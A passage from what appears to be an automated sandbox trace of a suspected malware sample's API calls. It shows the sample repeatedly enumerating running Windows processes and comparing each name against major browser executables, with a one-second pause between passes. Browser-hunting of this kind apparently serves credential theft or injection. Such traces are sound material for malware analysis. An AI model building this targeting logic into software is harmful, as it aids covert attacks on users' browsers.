(lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0200.947] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0200.947] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0200.947] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0200.947] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0200.947] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0200.947] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0200.947] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0200.947] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0200.948] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0200.948] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0200.948] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0200.948] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0200.948] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0200.948] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0200.948] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0200.948] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0200.948] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0200.948] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.948] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0200.949] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0200.949] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0200.949] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0200.949] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0200.949] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.949] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0200.949] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0200.949] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0200.949] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0200.950] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0200.950] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.950] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0200.950] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0200.950] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0200.950] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0200.950] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.950] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.951] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.951] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.951] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.951] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.951] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.951] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0200.951] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0200.951] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0200.951] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0200.951] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0200.951] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.951] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.952] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.952] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.952] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.952] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.952] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.952] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0200.953] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0200.953] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0200.953] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0200.953] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0200.953] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.953] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.953] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0200.953] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0200.953] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0200.953] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0200.953] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.953] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.954] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0200.954] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0200.954] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0200.954] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0200.954] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0200.954] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0200.954] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0200.954] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0200.955] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0200.955] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0200.955] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.955] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.955] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0200.955] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0200.955] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0200.955] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0200.955] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0200.955] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0201.025] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.026] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.026] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.026] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.026] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0201.026] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.026] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.027] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0201.027] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0201.027] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0201.027] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0201.027] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0201.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0201.027] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0201.027] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0201.027] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0201.027] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0201.027] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0201.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0201.028] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0201.028] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0201.028] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0201.028] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0201.028] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0201.028] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0201.028] CloseHandle (hObject=0xe8) returned 1 [0201.028] Sleep (dwMilliseconds=0x3e8) [0202.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0202.093] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.094] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0202.094] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0202.094] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0202.094] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0202.094] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0202.094] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0202.094] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0202.094] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0202.094] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0202.094] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0202.094] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0202.094] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0202.095] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0202.095] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0202.095] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0202.095] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0202.095] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.095] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.096] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0202.096] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0202.096] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0202.096] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0202.096] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.096] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0202.096] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0202.096] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0202.096] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0202.096] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0202.096] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.096] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.097] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0202.097] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0202.097] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0202.097] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0202.097] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.097] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0202.097] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0202.097] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0202.097] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0202.098] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0202.098] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.098] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0202.098] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0202.098] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0202.098] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0202.098] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0202.098] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.098] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0202.099] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0202.099] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0202.099] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0202.099] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0202.099] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.099] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0202.099] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0202.099] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0202.099] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0202.099] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0202.099] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0202.099] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.100] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.100] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.101] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.101] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.101] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.101] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.101] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.101] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.101] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.102] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0202.102] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0202.102] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0202.103] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0202.103] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0202.103] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0202.103] lstrcmpiA 